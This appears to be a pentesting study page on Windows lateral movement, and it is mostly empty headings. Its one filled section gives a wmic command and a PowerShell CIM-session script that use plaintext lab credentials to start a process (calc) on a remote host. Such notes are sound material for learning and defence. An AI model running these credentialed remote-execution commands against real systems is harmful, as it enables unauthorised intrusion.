Use of WMI and WinRM and Evil-WinRM
Use of WMI and WinRM and Evil-WinRM
Type 1: Using Powershell code (Shell Or GUI Needed)
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"# let's use the Powershell script to create a process of calc .
$username = 'jen'; # Set Username
$password = 'Nexus123!'; # Set Password
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.115.73 -Credential $credential -SessionOption $Options # Change IP to target machine IP
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# Make sure you change IP address in the code.
# This code just make a new process of calc.Type 2: using winRM (Shell Or GUI Needed)
Type 3: Powershell Remoting feature. (Shell Or GUI Needed)
Type 4: Using Evil-WinRM (No shell or GUI access needed)
Last updated